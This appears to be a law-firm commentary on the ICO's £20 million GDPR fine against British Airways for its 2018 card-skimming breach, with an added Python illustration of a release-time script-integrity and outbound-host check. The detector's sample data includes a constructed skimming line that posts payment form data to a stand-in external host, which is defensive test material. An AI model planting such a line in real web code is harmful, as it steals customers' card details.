The Information Commissioner had originally served a Notice of Intent to fine BA £183.39 million. The final fine would have been £30 million but was reduced by 20% to £24 million to take account of mitigating factors, including later improvements to security and BA’s offer to reimburse any losses suffered by customers.
The fine was then further reduced to £20 million in light of the Commissioner’s Covid-19 related regulatory action policy amendments. The penalty notice was served on 16th October 2020. The breach affected nearly 430,000 data subjects and related to a security breach lasting from 22nd June to 5th September 2018.
Controllers must protect against attackers; anticipate attempts to break out of Citrix environments; avoid storing passwords in plaintext; have processes in place to mitigate risks from accounts with privileged access rights; implement measures to detect unauthorised activity – including attempts to activate guest accounts in Windows and changes to website code; and have effective review processes for moving from a development to a live environment.
The breach involved access to stored credit card data and “skimming” of credit card data from BA’s website. The attacker used compromised credentials for an employee of Swissport, who had access rights to BA’s systems, to log into BA’s systems. The attacker then broke out of the Citrix environment accessible to the Swissport employee and accessed other BA systems. This included accessing usernames and passwords of privileged domain administrators and a system administrator. Using these credentials, the attacker exfiltrated credit card data from BA’s systems in two ways. First, the attacker found a record of credit card details and CVV numbers stored in plaintext. This record had been inadvertently created when BA carried out testing on a new feature and did not decommission a debugging script when the feature went live. Second, the attacker “skimmed” credit card data from britishairways.com by redirecting traffic to BAways.com. BA was notified of the redirection on 5th September 2018. It contained the vulnerability within 90 minutes of receiving notice and blocked the redirection within a further 20 minutes. In total, data relating to 429,612 individuals worldwide was affected, although not all of this included credit card data. Name, address, credit card number and CVV number were exfiltrated for 244,000 individuals.
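The two controls the notice singles out, detecting changes to website code and catching script that sends data somewhere it should not, can be reduced to a release-time integrity check. The following is an added illustration, not code from BA or the ICO: it compares a baseline of a site's own scripts against a later snapshot and flags hash changes and any absolute URL whose host is off an allow-list. All file names, contents and hosts are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed baseline: the site's own scripts as they were at release
# (hypothetical paths and contents, not any real airline's code).
BASELINE_SCRIPTS = {
    "js/checkout.js": "function submitCard(f){ return fetch('/api/pay', "
                      "{method:'POST', body:new FormData(f)}); }\n",
    "js/common.js": "window.app = {version: '1.0'};\n",
}

# Constructed later snapshot: checkout.js has gained a call that also sends
# the payment form to an external host, which is how skimming shows up in code.
CURRENT_SCRIPTS = {
    "js/checkout.js": "function submitCard(f){ fetch('https://cdn.not-our-domain.test/c', "
                      "{method:'POST', body:new FormData(f)}); return fetch('/api/pay', "
                      "{method:'POST', body:new FormData(f)}); }\n",
    "js/common.js": "window.app = {version: '1.0'};\n",
}

# Hosts the site is expected to talk to (constructed placeholders).
ALLOWED_HOSTS = {"www.example-airline.test", "static.example-airline.test"}

URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")


def fingerprint(scripts):
    """Map each script path to the SHA-256 of its content."""
    return {p: hashlib.sha256(c.encode()).hexdigest() for p, c in scripts.items()}


def changed_scripts(baseline, current):
    """Paths whose hash differs from the release baseline, plus added/removed files."""
    b, c = fingerprint(baseline), fingerprint(current)
    return {
        "changed": sorted(p for p in b if p in c and b[p] != c[p]),
        "added": sorted(set(c) - set(b)),
        "removed": sorted(set(b) - set(c)),
    }


def unexpected_hosts(scripts, allowed):
    """Absolute URLs inside script bodies whose host is not on the allow-list."""
    found = {}
    for path, content in scripts.items():
        hosts = {urlparse(u).hostname for u in URL_RE.findall(content)}
        bad = sorted(h for h in hosts if h and h not in allowed)
        if bad:
            found[path] = bad
    return found
```

Running both checks on every deployment, with the baseline recorded at the point code is approved for live, gives the dev-to-live review process a concrete artefact to compare against rather than relying on a later third-party notification.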
The Commissioner acknowledged that not every breach of security would amount to a breach of the GDPR and that she should not reason solely with the benefit of hindsight. The penalty notice describes her role as focusing on whether the controller implemented adequate and appropriate security measures; what risks were known or could reasonably have been known at the time; and determining whether there was a failure to put appropriate measures in place.
The Commissioner found multiple failings:
BA is facing group litigation in relation to the incident – and the findings of fault in the Commissioner’s monetary penalty notice will be helpful to the claimants there.
Breaches of security can trigger the higher, 4% fine – turnover is assessed by reference to the revenue of the controller responsible for the breach, not that of a parent company which is not the responsible controller.
Readers who know their GDPR by heart will know that the obligation to implement appropriate technical and organisational measures is set out in Art. 32 GDPR – for which the maximum fine is 2% of worldwide turnover or €10 million, whichever is higher. However, the GDPR also refers to an obligation to implement appropriate security in Article 5(1)(f) – among the data protection principles applicable to controllers – for which the maximum fine is 4% or €20 million.
ICO found BA to be in breach of Article 5(1)(f) – thus allowing the higher cap to be applied (although the actual penalty imposed is, in any event, within the lower amount).
BA is a subsidiary of International Consolidated Airlines Group S.A. ICO concluded that BA was the controller here and looked to BA’s turnover in assessing the penalty, not the turnover of its parent.
Relevant factors in setting and reducing the fine
The final decision notice doesn’t explain how the Commissioner arrived at the revised figure of £30 million. The penalty notice shows that BA argued (unsuccessfully) that the lack of clear guidance from the Commissioner as to the amount of a penalty that would be imposed should prevent the Commissioner from being able to impose any penalty – or should restrict her to pre-GDPR levels.
Mitigating factors included later investment in better security, the fact that BA carried out detailed customer outreach, made information available swiftly via the press, engaged with card issuers and offered to reimburse losses.
The Commissioner rejected arguments by BA that she relied too heavily on turnover to set the fine and that – by comparison with fines levied by other EEA authorities – this was too high. Unsurprisingly, she also rejected the argument from BA that security breaches involving credit card data are so commonplace that it was not credible for the Commissioner to assert, as a factor in setting the penalty, that cardholders would have suffered some distress. Readers may be interested to note that the Commissioner relied on an ENISA methodology to assess the severity of the breach.